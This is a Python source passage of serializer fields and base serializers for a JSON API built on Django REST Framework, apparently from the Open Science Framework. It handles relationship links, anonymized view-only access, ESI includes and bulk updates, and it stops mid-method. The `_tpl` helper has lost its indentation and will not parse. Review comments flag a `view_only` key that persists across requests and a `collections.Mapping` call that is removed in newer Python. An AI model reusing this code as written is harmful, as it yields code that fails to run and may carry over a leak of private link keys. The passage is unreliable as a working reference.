class AnonymizedRegexField(AuthorizedCharField):
    r"""
    Performs a regex replace on the content of the authorized object's
    source field when an anonymous view is requested.
    Example:
        content = AnonymizedRegexField(source='get_content', regex='\[@[^\]]*\]\([^\) ]*\)', replace='@A User')
    """
    def __init__(self, source, regex, replace, **kwargs):
        self.source = source
        self.regex = regex
        self.replace = replace
        super(AnonymizedRegexField, self).__init__(source=self.source, **kwargs)
    def get_attribute(self, obj):
        value = super(AnonymizedRegexField, self).get_attribute(obj)
        if not value:
            return value
        request = self.context['request']
        auth = auth_core.Auth(request.user)
        if 'view_only' in request.query_params:
            auth.private_key = request.query_params['view_only']
            # Only scrub the content when the link is actually anonymized.
            if has_anonymous_link(obj.node, auth):
                value = re.sub(self.regex, self.replace, value)
        return value
class RelationshipField(ser.HyperlinkedIdentityField):
    """
    RelationshipField that permits the return of both self and related links, along with optional
    meta information. ::
        children = RelationshipField(
            related_view='nodes:node-children',
            related_view_kwargs={'node_id': '<_id>'},
            self_view='nodes:node-node-children-relationship',
            self_view_kwargs={'node_id': '<_id>'},
            related_meta={'count': 'get_node_count'}
        )
    The lookup field must be surrounded in angular brackets to find the attribute on the target. Otherwise, the lookup
    field is assumed to be a method on the serializer. ::
        root = RelationshipField(
            related_view='nodes:node-detail',
            related_view_kwargs={'node_id': '<root._id>'}
        )
        region = RegionRelationshipField(
            related_view='regions:region-detail',
            related_view_kwargs={'region_id': 'get_region_id'},
            read_only=False
        )
    'root._id' is enclosed in angular brackets, but 'get_region_id' is not.
    'root._id' will be looked up on the target, but 'get_region_id' will be executed on the serializer.
    Field can handle a filter_key, which operates as the source field (but
    is named differently to not interfere with HyperLinkedIdentifyField's source).
    The ``filter_key`` argument defines the Mongo key (or ODM field name) to filter on
    when using the ``FilterMixin`` on a view. ::
        parent = RelationshipField(
            related_view='nodes:node-detail',
            related_view_kwargs={'node_id': '<parent_node._id>'},
            filter_key='parent_node'
        )
    Field can include optional filters:
    Example:
        replies = RelationshipField(
            self_view='nodes:node-comments',
            self_view_kwargs={'node_id': '<node._id>'},
            filter={'target': '<_id>'})
        )
    """
    json_api_link = True  # serializes to a links object
    def __init__(
        self, related_view=None, related_view_kwargs=None, self_view=None, self_view_kwargs=None,
        self_meta=None, related_meta=None, always_embed=False, filter=None, filter_key=None, required=False, **kwargs
    ):
        # (The next two self-assignments are no-ops kept as-is.)
        related_view = related_view
        self_view = self_view
        related_kwargs = related_view_kwargs
        self_kwargs = self_view_kwargs
        self.views = {'related': related_view, 'self': self_view}
        self.view_kwargs = {'related': related_kwargs, 'self': self_kwargs}
        self.related_meta = related_meta
        self.self_meta = self_meta
        self.always_embed = always_embed
        self.filter = filter
        self.filter_key = filter_key
        assert (related_view is not None or self_view is not None), 'Self or related view must be specified.'
        if related_view:
            assert related_kwargs is not None, 'Must provide related view kwargs.'
            # View kwargs may be a callable resolved per-object; only dicts are type-checked.
            if not callable(related_kwargs):
                assert isinstance(
                    related_kwargs,
                    dict,
                ), "Related view kwargs must have format {'lookup_url_kwarg: lookup_field}."
        if self_view:
            assert self_kwargs is not None, 'Must provide self view kwargs.'
            assert isinstance(self_kwargs, dict), "Self view kwargs must have format {'lookup_url_kwarg: lookup_field}."
        # The related view (when present) is the canonical one handed to DRF's base class.
        view_name = related_view
        if view_name:
            lookup_kwargs = related_kwargs
        else:
            view_name = self_view
            lookup_kwargs = self_kwargs
        if kwargs.get('lookup_url_kwarg', None):
            lookup_kwargs = kwargs.pop('lookup_url_kwarg')
        super(RelationshipField, self).__init__(view_name, lookup_url_kwarg=lookup_kwargs, **kwargs)
        # Allow a RelationshipField to be modified if explicitly set so
        if kwargs.get('read_only') is not None:
            self.read_only = kwargs['read_only']
        # Allow a RelationshipField to be required
        if required:
            assert not self.read_only, 'May not set both `read_only` and `required`'
            self.required = required
    def resolve(self, resource, field_name, request):
        """
        Resolves the view when embedding.
        """
        lookup_url_kwarg = self.lookup_url_kwarg
        # Both the kwargs and the view name may be callables resolved against the resource.
        if callable(lookup_url_kwarg):
            lookup_url_kwarg = lookup_url_kwarg(getattr(resource, field_name))
        kwargs = {attr_name: self.lookup_attribute(resource, attr) for (attr_name, attr) in lookup_url_kwarg.items()}
        kwargs.update({'version': request.parser_context['kwargs']['version']})
        view = self.view_name
        if callable(self.view_name):
            view = view(getattr(resource, field_name))
        return resolve(
            reverse(
                view,
                kwargs=kwargs,
            ),
        )
    def process_related_counts_parameters(self, params, value):
        """
        Processes related_counts parameter.
        Can either be a True/False value for fetching counts on all fields, or a comma-separated list for specifying
        individual fields. Ensures field for which we are requesting counts is a relationship field.
        """
        if utils.is_truthy(params) or utils.is_falsy(params):
            return params
        field_counts_requested = [val for val in params.split(',')]
        # Fields that can carry counts: relationship fields, possibly wrapped (e.g. ConditionalField).
        countable_fields = {field for field in self.parent.fields if
                            getattr(self.parent.fields[field], 'json_api_link', False) or
                            getattr(getattr(self.parent.fields[field], 'field', None), 'json_api_link', None)}
        for count_field in field_counts_requested:
            # Some fields will hide relationships, e.g. HideIfWithdrawal
            # Ignore related_counts for these fields
            fetched_field = self.parent.fields.get(count_field)
            hidden = fetched_field and isinstance(fetched_field, HideIfWithdrawal) and getattr(value, 'is_retracted', False)
            if not hidden and count_field not in countable_fields:
                raise api_exceptions.InvalidQueryStringError(
                    detail="Acceptable values for the related_counts query param are 'true', 'false', or any of the relationship fields; got '{0}'".format(
                        params,
                    ),
                    parameter='related_counts',
                )
        return field_counts_requested
    def get_meta_information(self, meta_data, value):
        """
        For retrieving meta values, otherwise returns {}
        """
        meta = {}
        for key in meta_data or {}:
            if key == 'count' or key == 'unread':
                # Counts are only computed when requested via ?related_counts=... and
                # never inside embedded serializations.
                show_related_counts = self.context['request'].query_params.get('related_counts', False)
                if self.context['request'].parser_context.get('kwargs'):
                    if self.context['request'].parser_context['kwargs'].get('is_embedded'):
                        show_related_counts = False
                field_counts_requested = self.process_related_counts_parameters(show_related_counts, value)
                if utils.is_truthy(show_related_counts):
                    meta[key] = functional.rapply(meta_data[key], _url_val, obj=value, serializer=self.parent, request=self.context['request'])
                elif utils.is_falsy(show_related_counts):
                    continue
                elif self.field_name in field_counts_requested:
                    meta[key] = functional.rapply(meta_data[key], _url_val, obj=value, serializer=self.parent, request=self.context['request'])
                else:
                    continue
            elif key == 'projects_in_common':
                # Requires an authenticated user plus explicit opt-in via query param.
                if not utils.get_user_auth(self.context['request']).user:
                    continue
                if not self.context['request'].query_params.get('show_projects_in_common', False):
                    continue
                meta[key] = functional.rapply(meta_data[key], _url_val, obj=value, serializer=self.parent, request=self.context['request'])
            else:
                meta[key] = functional.rapply(meta_data[key], _url_val, obj=value, serializer=self.parent, request=self.context['request'])
        return meta
    def lookup_attribute(self, obj, lookup_field):
        """
        Returns attribute from target object unless attribute surrounded in angular brackets where it returns the lookup field.
        Also handles the lookup of nested attributes.
        """
        bracket_check = _tpl(lookup_field)
        if bracket_check:
            source_attrs = bracket_check.split('.')
            # If you are using a nested attribute for lookup, and you get the attribute wrong, you will not get an
            # error message, you will just not see that field. This allows us to have slightly more dynamic use of
            # nested attributes in relationship fields.
            try:
                return_val = get_nested_attributes(obj, source_attrs)
            except (KeyError, AttributeError):
                return None
            return return_val
        return lookup_field
    def kwargs_lookup(self, obj, kwargs_dict):
        """
        For returning kwargs dictionary of format {"lookup_url_kwarg": lookup_value}
        """
        if callable(kwargs_dict):
            kwargs_dict = kwargs_dict(obj)
        kwargs_retrieval = {}
        for lookup_url_kwarg, lookup_field in kwargs_dict.items():
            # Bracketed fields resolve on the target object; plain strings
            # resolve as serializer methods (via _url_val).
            if _tpl(lookup_field):
                lookup_value = self.lookup_attribute(obj, lookup_field)
            else:
                lookup_value = _url_val(lookup_field, obj, self.parent, self.context['request'])
            # Any unresolvable kwarg invalidates the whole URL.
            if lookup_value is None:
                return None
            kwargs_retrieval[lookup_url_kwarg] = lookup_value
        return kwargs_retrieval
    # Overrides HyperlinkedIdentityField
    def get_url(self, obj, view_name, request, format):
        """Build the 'related' and 'self' URLs (or {} placeholders) for this relationship."""
        urls = {}
        for view_name, view in self.views.items():
            if view is None:
                urls[view_name] = {}
            else:
                kwargs = self.kwargs_lookup(obj, self.view_kwargs[view_name])
                if kwargs is None:
                    urls[view_name] = {}
                else:
                    if callable(view):
                        view = view(getattr(obj, self.field_name))
                    if request.parser_context['kwargs'].get('version', False):
                        kwargs.update({'version': request.parser_context['kwargs']['version']})
                    url = self.reverse(view, kwargs=kwargs, request=request, format=format)
                    if self.filter:
                        # Append filter[...] query params; an unresolvable filter kills the URL.
                        formatted_filters = self.format_filter(obj)
                        if formatted_filters:
                            for filter in formatted_filters:
                                url = utils.extend_querystring_params(
                                    url,
                                    {'filter[{}]'.format(filter['field_name']): filter['value']},
                                )
                        else:
                            url = None
                    if url:
                        # Propagate view_only keys so anonymized links keep working.
                        url = utils.extend_querystring_if_key_exists(
                            url, self.context['request'],
                            'view_only',
                        )
                    urls[view_name] = url
        if not urls['self'] and not urls['related']:
            urls = None
        return urls
    def to_esi_representation(self, value, envelope='data'):
        """Render this relationship as an ESI include tag pointing at its related URL."""
        relationships = self.to_representation(value)
        try:
            href = relationships['links']['related']['href']
        except KeyError:
            raise SkipField
        else:
            if href and not href == '{}':
                if self.always_embed:
                    envelope = 'data'
                query_dict = dict(format=['jsonapi', ], envelope=[envelope, ])
                if 'view_only' in self.parent.context['request'].query_params.keys():
                    query_dict.update(view_only=[self.parent.context['request'].query_params['view_only']])
                esi_url = utils.extend_querystring_params(href, query_dict)
                return '<esi:include src="{}"/>'.format(esi_url)
    def format_filter(self, obj):
        """ Take filters specified in self.filter and format them in a way that can be easily parametrized
        :param obj: RelationshipField object
        :return: list of dictionaries with 'field_name' and 'value' for each filter
        """
        filter_fields = self.filter.keys()
        filters = []
        for field_name in filter_fields:
            try:
                # check if serializer method passed in
                serializer_method = getattr(self.parent, self.filter[field_name])
            except AttributeError:
                value = self.lookup_attribute(obj, self.filter[field_name])
            else:
                value = serializer_method(obj)
            if not value:
                continue
            filters.append({'field_name': field_name, 'value': value})
        return filters if filters else None
    def to_internal_value(self, data):
        # Relationships are parsed elsewhere; pass the payload through untouched.
        return data
    # Overrides HyperlinkedIdentityField
    def to_representation(self, value):
        """Serialize to a JSON API relationship object with links (and data for detail routes)."""
        request = self.context.get('request', None)
        format = self.context.get('format', None)
        assert request is not None, (
            '`%s` requires the request in the serializer'
            " context. Add `context={'request': request}` when instantiating "
            'the serializer.' % self.__class__.__name__
        )
        # By default use whatever format is given for the current context
        # unless the target is a different type to the source.
        #
        # Eg. Consider a HyperlinkedIdentityField pointing from a json
        # representation to an html property of that representation...
        #
        # '/snippets/1/' should link to '/snippets/1/highlight/'
        # ...but...
        # '/snippets/1/.json' should link to '/snippets/1/highlight/.html'
        if format and self.format and self.format != format:
            format = self.format
        # Return the hyperlink, or error if incorrectly configured.
        try:
            url = self.get_url(value, self.view_name, request, format)
        except NoReverseMatch:
            msg = (
                'Could not resolve URL for hyperlinked relationship using '
                'view name "%s". You may have failed to include the related '
                'model in your API, or incorrectly configured the '
                '`lookup_field` attribute on this field.'
            )
            if value in ('', None):
                value_string = {'': 'the empty string', None: 'None'}[value]
                msg += (
                    ' WARNING: The value of the field on the model instance '
                    "was %s, which may be why it didn't match any "
                    'entries in your URL conf.' % value_string
                )
            raise ImproperlyConfigured(msg % self.view_name)
        if url is None:
            # Prior to 2.9, empty relationships were omitted from the response.
            # This conflicts with the JSON-API spec and was fixed in 2.9.
            if StrictVersion(request.version) < StrictVersion('2.9'):
                raise SkipField
            else:
                return {'data': None}
        related_url = url['related']
        related_path = urlparse(related_url).path if related_url else None
        related_meta = self.get_meta_information(self.related_meta, value)
        self_url = url['self']
        self_meta = self.get_meta_information(self.self_meta, value)
        relationship = format_relationship_links(related_url, self_url, related_meta, self_meta)
        # NOTE(review): the parity check on path segments appears to distinguish
        # detail routes (odd segment count, e.g. /v2/nodes/<id>/) from list
        # routes — confirm before touching.
        if related_url and (len(related_path.split('/')) & 1) == 1:
            resolved_url = resolve(related_path)
            related_class = resolved_url.func.view_class
            if issubclass(related_class, RetrieveModelMixin):
                related_type = resolved_url.namespace
                try:
                    # TODO: change kwargs to preprint_provider_id and registration_id
                    if related_type == 'preprint_providers':
                        related_id = resolved_url.kwargs['provider_id']
                    elif related_type == 'registrations':
                        related_id = resolved_url.kwargs['node_id']
                    else:
                        # Default convention: singularize the namespace and append '_id'.
                        related_id = resolved_url.kwargs[related_type[:-1] + '_id']
                except KeyError:
                    return relationship
                relationship['data'] = {'id': related_id, 'type': related_type}
        return relationship
class TypedRelationshipField(RelationshipField):
    """ Overrides get_url to inject a typed namespace.
    Assumption: Namespaces for each type MUST be the same as the dasharized JSONAPI-type
    """
    def get_url(self, obj, view_name, request, format):
        # Only rewrite two-part names ('namespace:view'); already-typed names
        # (three parts) are left alone on subsequent calls.
        if len(view_name.split(':')) == 2:
            untyped_view = view_name
            view_parts = view_name.split(':')
            request = self.context.get('request', None)
            # Insert the dasherized JSONAPI type between namespace and view name.
            if isinstance(self.root, JSONAPIListSerializer):
                view_parts.insert(1, get_meta_type(self.root.child, request).replace('_', '-'))
            else:
                view_parts.insert(1, get_meta_type(self.root, request).replace('_', '-'))
            # Cache the typed name on the field so future lookups reuse it.
            self.view_name = view_name = ':'.join(view_parts)
            for k, v in self.views.items():
                if v == untyped_view:
                    self.views[k] = view_name
        return super(TypedRelationshipField, self).get_url(obj, view_name, request, format)
class FileRelationshipField(RelationshipField):
    """RelationshipField rendered only for files; folders omit it entirely."""
    def get_url(self, obj, view_name, request, format):
        if obj.kind != 'folder':
            return super(FileRelationshipField, self).get_url(obj, view_name, request, format)
        raise SkipField
class TargetField(ser.Field):
    """
    Field that returns a nested dict with the url (constructed based
    on the object's type), optional meta information, and link_type.
    Example:
        target = TargetField(link_type='related', meta={'type': 'get_target_type'})
    """
    json_api_link = True  # serializes to a links object
    # Maps a target referent's `_name` to the detail view and URL kwarg used to embed it.
    view_map = {
        'node': {
            'view': 'nodes:node-detail',
            'lookup_kwarg': 'node_id',
        },
        'preprint': {
            'view': 'preprints:preprint-detail',
            'lookup_kwarg': 'preprint_id',
        },
        'comment': {
            'view': 'comments:comment-detail',
            'lookup_kwarg': 'comment_id',
        },
        'nodewikipage': {
            'view': None,
            'lookup_kwarg': None,
        },
    }
    def __init__(self, **kwargs):
        # Optional meta spec and the links-object key to emit ('url' by default).
        self.meta = kwargs.pop('meta', {})
        self.link_type = kwargs.pop('link_type', 'url')
        super(TargetField, self).__init__(read_only=True, **kwargs)
    def resolve(self, resource, field_name, request):
        """
        Resolves the view for target node or target comment when embedding.
        """
        view_info = self.view_map.get(resource.target.referent._name, None)
        if not view_info:
            raise api_exceptions.TargetNotSupportedError('{} is not a supported target type'.format(
                resource.target._name,
            ))
        if not view_info['view']:
            # Mapped but unembeddable target types (e.g. nodewikipage).
            return None, None, None
        embed_value = resource.target._id
        return resolve(
            reverse(
                view_info['view'],
                kwargs={
                    view_info['lookup_kwarg']: embed_value,
                    'version': request.parser_context['kwargs']['version'],
                },
            ),
        )
    def to_esi_representation(self, value, envelope='data'):
        # Emit an ESI include when the target has an absolute URL; otherwise
        # fall back to the ordinary representation.
        href = value.get_absolute_url()
        if href:
            esi_url = utils.extend_querystring_params(href, dict(envelope=[envelope, ], format=['jsonapi', ]))
            return '<esi:include src="{}"/>'.format(esi_url)
        return self.to_representation(value)
    def to_representation(self, value):
        """
        Returns nested dictionary in format {'links': {self.link_type: ... }
        If no meta information, self.link_type is equal to a string containing link's URL. Otherwise,
        the link is represented as a links object with 'href' and 'meta' members.
        """
        meta = functional.rapply(self.meta, _url_val, obj=value, serializer=self.parent, request=self.context['request'])
        # Guid-like values expose the real object via `referent`.
        obj = getattr(value, 'referent', value)
        return {'links': {self.link_type: {'href': obj.get_absolute_url(), 'meta': meta}}}
class LinksField(ser.Field):
    """Links field that resolves to a links object. Used in conjunction with `Link`.
    If the object to be serialized implements `get_absolute_url`, then the return value
    of that method is used for the `self` link.
    Example: ::
        links = LinksField({
            'html': 'absolute_url',
            'children': {
                'related': Link('nodes:node-children', node_id='<_id>'),
                'count': 'get_node_count'
            },
            'contributors': {
                'related': Link('nodes:node-contributors', node_id='<_id>'),
                'count': 'get_contrib_count'
            },
            'registrations': {
                'related': Link('nodes:node-registrations', node_id='<_id>'),
                'count': 'get_registration_count'
            },
        })
    """
    def __init__(self, links, *args, **kwargs):
        ser.Field.__init__(self, read_only=True, *args, **kwargs)
        # Mapping of link name -> Link object / serializer-method name / literal.
        self.links = links
    def get_attribute(self, obj):
        # We pass the object instance onto `to_representation`,
        # not just the field attribute.
        return obj
    def extend_absolute_info_url(self, obj):
        # Preserve any view_only key when emitting the 'info' URL.
        return utils.extend_querystring_if_key_exists(obj.get_absolute_info_url(), self.context['request'], 'view_only')
    def extend_absolute_url(self, obj):
        # Preserve any view_only key when emitting the 'self' URL.
        return utils.extend_querystring_if_key_exists(obj.get_absolute_url(), self.context['request'], 'view_only')
    def to_representation(self, obj):
        ret = {}
        for name, value in self.links.items():
            try:
                url = _url_val(value, obj=obj, serializer=self.parent, request=self.context['request'])
            except SkipField:
                # Unresolvable links are simply omitted from the links object.
                continue
            else:
                ret[name] = url
        if hasattr(obj, 'get_absolute_url') and 'self' not in self.links:
            ret['self'] = self.extend_absolute_url(obj)
        if 'info' in ret:
            if hasattr(obj, 'get_absolute_info_url'):
                ret['info'] = self.extend_absolute_info_url(obj)
            else:
                ret['info'] = utils.extend_querystring_if_key_exists(ret['info'], self.context['request'], 'view_only')
        return ret
_tpl_pattern = re.compile(r'\s*<\s*(\S*)\s*>\s*')
def _tpl(val):
"""Return value within ``< >`` if possible, else return ``None``."""
match = _tpl_pattern.match(val)
if match:
return match.groups()[0]
return None
def _get_attr_from_tpl(attr_tpl, obj):
    """Resolve a ``<dotted.attr>`` template against *obj*.

    Non-bracketed values are returned unchanged. Bracketed names are resolved
    as a chain of attribute lookups; if that fails, a mapping-style lookup
    (``obj[attr_name]``) is attempted before raising AttributeError.
    """
    attr_name = _tpl(str(attr_tpl))
    if attr_name:
        attribute_value = obj
        # Walk the dotted path; ser.empty marks a failed attribute lookup.
        for attr_segment in attr_name.split('.'):
            attribute_value = getattr(attribute_value, attr_segment, ser.empty)
        if attribute_value is not ser.empty:
            return attribute_value
        elif attr_name in obj:
            # Fallback: obj may be dict-like and hold the name as a key.
            return obj[attr_name]
        else:
            raise AttributeError(
                '{attr_name!r} is not a valid '
                'attribute of {obj!r}'.format(
                    attr_name=attr_name, obj=obj,
                ),
            )
    else:
        return attr_tpl
# TODO: Make this a Field that is usable on its own?
class Link(object):
    """Link object to use in conjunction with Links field. Does reverse lookup of
    URLs given an endpoint name and attributes enclosed in `<>`. This includes
    complex key strings like 'user.id'.
    """
    def __init__(self, endpoint, args=None, kwargs=None, query_kwargs=None, **kw):
        self.endpoint = endpoint
        self.kwargs = kwargs or {}
        self.args = args or tuple()
        self.reverse_kwargs = kw
        self.query_kwargs = query_kwargs or {}
    def resolve_url(self, obj, request):
        """Reverse the endpoint with all `<...>` templates resolved against *obj*."""
        resolved_kwargs = {name: _get_attr_from_tpl(tpl, obj) for name, tpl in self.kwargs.items()}
        resolved_kwargs.update({'version': request.parser_context['kwargs']['version']})
        resolved_args = [_get_attr_from_tpl(tpl, obj) for tpl in self.args]
        resolved_query = {name: _get_attr_from_tpl(tpl, obj) for name, tpl in self.query_kwargs.items()}
        # Presumably, if you are expecting a value but the value is empty, the link is invalid.
        for name in resolved_kwargs:
            if resolved_kwargs[name] is None:
                raise SkipField
        return utils.absolute_reverse(
            self.endpoint,
            args=resolved_args,
            kwargs=resolved_kwargs,
            query_kwargs=resolved_query,
            **self.reverse_kwargs
        )
class WaterbutlerLink(Link):
    """Link object to use in conjunction with Links field. Builds a Waterbutler URL for files.
    """
    def __init__(self, must_be_file=None, must_be_folder=None, **kwargs):
        # NOTE(review): intentionally does NOT call super().__init__; this class
        # repurposes `self.kwargs` as raw query parameters for the WB URL.
        self.kwargs = kwargs
        self.must_be_file = must_be_file
        self.must_be_folder = must_be_folder
    def resolve_url(self, obj, request):
        """Reverse URL lookup for WaterButler routes
        """
        # Trailing slash on the path marks a folder in WaterButler.
        if self.must_be_folder is True and not obj.path.endswith('/'):
            raise SkipField
        if self.must_be_file is True and obj.path.endswith('/'):
            raise SkipField
        # NOTE(review): this writes into self.kwargs, so a view_only key from one
        # request persists on the field instance for later requests — confirm
        # whether that cross-request leakage is intended.
        if 'view_only' not in self.kwargs:
            view_only = request.query_params.get('view_only', False)
            if view_only:
                self.kwargs['view_only'] = view_only
        # Region-aware storage targets carry their own WaterButler base URL.
        base_url = None
        if hasattr(obj.target, 'osfstorage_region'):
            base_url = obj.target.osfstorage_region.waterbutler_url
        url = utils.waterbutler_api_url_for(obj.target._id, obj.provider, obj.path, base_url=base_url, **self.kwargs)
        if not url:
            raise SkipField
        else:
            return url
class NodeFileHyperLinkField(RelationshipField):
    """RelationshipField variant that only renders for file objects whose
    ``kind`` matches the one given at construction time."""
    def __init__(self, kind=None, never_embed=False, **kws):
        self.kind = kind
        self.never_embed = never_embed
        super(NodeFileHyperLinkField, self).__init__(**kws)
    def get_url(self, obj, view_name, request, format):
        # Hide the link entirely when the object's kind does not match.
        if self.kind and self.kind != obj.kind:
            raise SkipField
        return super(NodeFileHyperLinkField, self).get_url(obj, view_name, request, format)
class JSONAPIListSerializer(ser.ListSerializer):
    """ListSerializer that renders each child without a JSON API envelope and
    implements bulk update semantics (including the ``skip_uneditable``
    query parameter)."""
    def to_representation(self, data):
        enable_esi = self.context.get('enable_esi', False)
        # Don't envelope when serializing collection.
        # BUG FIX: the previous code did ``envelope = self.context.update(...)``,
        # silently relying on dict.update() returning None. Make both the
        # context mutation and the resulting envelope value explicit.
        self.context.update({'envelope': None})
        envelope = None
        errors = {}
        bulk_skip_uneditable = utils.is_truthy(self.context['request'].query_params.get('skip_uneditable', False))
        # NOTE(review): collections.Mapping was removed in Python 3.10; this
        # should move to collections.abc.Mapping once Python 2 support is gone.
        if isinstance(data, collections.Mapping):
            errors = data.get('errors', None)
            data = data.get('data', None)
        if enable_esi:
            ret = [
                self.child.to_esi_representation(item, envelope=None) for item in data
            ]
        else:
            ret = [
                self.child.to_representation(item, envelope=envelope) for item in data
            ]
        # Bulk updates report per-item failures alongside the successes.
        if errors and bulk_skip_uneditable:
            ret.append({'errors': errors})
        return ret
    # Overrides ListSerializer which doesn't support multiple update by default
    def update(self, instance, validated_data):
        """Bulk-update ``instance`` (a list of objects) from ``validated_data``.

        When ``skip_uneditable`` is set, items the user could not edit are
        returned under ``'errors'`` instead of raising.
        """
        # avoiding circular import
        from api.nodes.serializers import CompoundIDField
        # if PATCH request, the child serializer's partial attribute needs to be True
        if self.context['request'].method == 'PATCH':
            self.child.partial = True
        bulk_skip_uneditable = utils.is_truthy(self.context['request'].query_params.get('skip_uneditable', False))
        if not bulk_skip_uneditable:
            if len(instance) != len(validated_data):
                raise exceptions.ValidationError({'non_field_errors': 'Could not find all objects to update.'})
        id_lookup = self.child.fields['id'].source
        data_mapping = {item.get(id_lookup): item for item in validated_data}
        if isinstance(self.child.fields['id'], CompoundIDField):
            instance_mapping = {self.child.fields['id'].get_id(item): item for item in instance}
        else:
            instance_mapping = {getattr(item, id_lookup): item for item in instance}
        ret = {'data': []}
        for resource_id, resource in instance_mapping.items():
            data = data_mapping.pop(resource_id, None)
            ret['data'].append(self.child.update(resource, data))
        # If skip_uneditable in request, add validated_data for nodes in which the user did not have edit permissions to errors
        if data_mapping and bulk_skip_uneditable:
            ret.update({'errors': data_mapping.values()})
        return ret
    # overrides ListSerializer
    def run_validation(self, data):
        """Enforce the bulk-operation size limit before normal validation."""
        meta = getattr(self, 'Meta', None)
        bulk_limit = getattr(meta, 'bulk_limit', BULK_SETTINGS['DEFAULT_BULK_LIMIT'])
        num_items = len(data)
        if num_items > bulk_limit:
            raise api_exceptions.JSONAPIException(
                source={'pointer': '/data'},
                detail='Bulk operation limit is {}, got {}.'.format(bulk_limit, num_items),
            )
        return super(JSONAPIListSerializer, self).run_validation(data)
    # overrides ListSerializer: Add HTML-sanitization similar to that used by APIv1 front-end views
    def is_valid(self, clean_html=True, **kwargs):
        """
        After validation, scrub HTML from validated_data prior to saving (for create and update views)
        Exclude 'type' from validated_data.
        """
        ret = super(JSONAPIListSerializer, self).is_valid(**kwargs)
        if clean_html is True:
            self._validated_data = functional.rapply(self.validated_data, sanitize.strip_html)
        for data in self._validated_data:
            data.pop('type', None)
        return ret
class SparseFieldsetMixin(object):
    """Mixin implementing JSON API sparse fieldsets (``fields[TYPE]=a,b``)."""
    def parse_sparse_fields(self, allow_unsafe=False, **kwargs):
        request = kwargs.get('context', {}).get('request', None)
        if not request:
            return
        if not (allow_unsafe or request.method in permissions.SAFE_METHODS):
            return
        fieldset_param = 'fields[{}]'.format(get_meta_type(self, request))
        if fieldset_param not in request.query_params:
            return
        requested = request.query_params[fieldset_param].split(',')
        for field_name in self.fields.fields.copy().keys():
            if field_name in ('id', 'links', 'type'):
                # MUST return these fields
                continue
            if field_name not in requested:
                self.fields.pop(field_name)
class BaseAPISerializer(ser.Serializer, SparseFieldsetMixin):
    """Serializer base class that applies sparse fieldsets at construction
    time and records the model field name backing each serializer field."""
    def __init__(self, *args, **kwargs):
        self.parse_sparse_fields(**kwargs)
        super(BaseAPISerializer, self).__init__(*args, **kwargs)
        names = []
        for name, field in self.fields.items():
            # A source of '*' means the field maps to the whole object; use
            # the serializer field name in that case.
            names.append(name if field.source == '*' else field.source)
        self.model_field_names = names
class JSONAPISerializer(BaseAPISerializer):
    """Base serializer. Requires that a `type_` option is set on `class Meta`. Also
    allows for enveloping of both single resources and collections. Looks to nest fields
    according to JSON API spec. Relational fields must set json_api_link=True flag.
    Self/html links must be nested under "links".
    """
    # SerializerMethodFields listed here accept writes; validation for them is
    # expected to happen in the model (see run_validation below).
    writeable_method_fields = frozenset([])
    # Don't serialize relationships that use these views
    # when viewing thru an anonymous VOL
    views_to_hide_if_anonymous = {
        'users:user-detail',
        'nodes:node-registrations',
    }
    # overrides Serializer
    @classmethod
    def many_init(cls, *args, **kwargs):
        # Wrap collections in JSONAPIListSerializer so bulk semantics apply.
        kwargs['child'] = cls(*args, **kwargs)
        return JSONAPIListSerializer(*args, **kwargs)
    def invalid_embeds(self, fields, embeds):
        """Return the set of requested embed names that are not embeddable,
        i.e. not relationship fields carrying the ``json_api_link`` flag."""
        fields_check = fields[:]
        for index, field in enumerate(fields_check):
            if getattr(field, 'field', None):
                # Unwrap one level of field nesting before inspecting flags.
                fields_check[index] = field.field
        invalid_embeds = set(embeds.keys()) - set(
            [f.field_name for f in fields_check if getattr(f, 'json_api_link', False)],
        )
        return invalid_embeds
    def to_esi_representation(self, data, envelope='data'):
        """Render an ``<esi:include>`` tag pointing at this resource's URL so
        an edge cache can assemble the response; fall back to normal
        serialization when no usable URL can be built."""
        href = None
        query_params_blacklist = ['page[size]']
        href = self.get_absolute_url(data)
        if href and href != '{}':
            # Carry the request's query params over to the ESI URL, minus the
            # blacklisted ones, and force the desired envelope.
            esi_url = furl.furl(href).add(args=dict(self.context['request'].query_params)).remove(
                args=query_params_blacklist,
            ).remove(args=['envelope']).add(args={'envelope': envelope}).url
            return '<esi:include src="{}"/>'.format(esi_url)
        # failsafe, let python do it if something bad happened in the ESI construction
        return super(JSONAPISerializer, self).to_representation(data)
    def run_validation(self, data):
        # Overrides construtor for validated_data to allow writes to a SerializerMethodField
        # Validation for writeable SMFs is expected to happen in the model
        _validated_data = super(JSONAPISerializer, self).run_validation(data)
        for field in self.writeable_method_fields:
            if field in data:
                _validated_data[field] = data[field]
        return _validated_data
    def get_unwrapped_field(self, field):
        """
        Returns the lowest nested field. If no nesting, returns the original field.
        :param field, highest field
        Assumes nested structures like the following:
        - field, field.field, field.child_relation, field.field.child_relation, etc.
        """
        while hasattr(field, 'field'):
            field = field.field
        return getattr(field, 'child_relation', field)
    # overrides Serializer
    def to_representation(self, obj, envelope='data'):
        """Serialize to final representation.
        :param obj: Object to be serialized.
        :param envelope: Key for resource object.
        """
        ret = {}
        request = self.context.get('request')
        type_ = get_meta_type(self, request)
        assert type_ is not None, 'Must define Meta.type_ or Meta.get_type()'
        self.parse_sparse_fields(allow_unsafe=True, context=self.context)
        # Skeleton of a JSON API resource object; empty sections are pruned
        # at the end.
        data = {
            'id': '',
            'type': type_,
            'attributes': {},
            'relationships': {},
            'embeds': {},
            'links': {},
        }
        embeds = self.context.get('embed', {})
        # The context's envelope (possibly the string 'None') takes priority
        # over the keyword argument.
        context_envelope = self.context.get('envelope', envelope)
        if context_envelope == 'None':
            context_envelope = None
        enable_esi = self.context.get('enable_esi', False)
        is_anonymous = is_anonymized(self.context['request'])
        to_be_removed = set()
        if is_anonymous and hasattr(self, 'non_anonymized_fields'):
            # Drop any fields that are not specified in the `non_anonymized_fields` variable.
            allowed = set(self.non_anonymized_fields)
            existing = set(self.fields.keys())
            to_be_removed = existing - allowed
        fields = [
            field for field in self.fields.values() if
            not field.write_only and field.field_name not in to_be_removed
        ]
        invalid_embeds = self.invalid_embeds(fields, embeds)
        invalid_embeds = invalid_embeds - to_be_removed
        if invalid_embeds:
            raise api_exceptions.InvalidQueryStringError(
                parameter='embed',
                detail='The following fields are not embeddable: {}'.format(
                    ', '.join(invalid_embeds),
                ),
            )
        for field in fields:
            nested_field = self.get_unwrapped_field(field)
            try:
                if hasattr(field, 'child_relation'):
                    attribute = field.child_relation.get_attribute(obj)
                else:
                    attribute = field.get_attribute(obj)
            except SkipField:
                continue
            if attribute is None:
                # We skip `to_representation` for `None` values so that
                # fields do not have to explicitly deal with that case.
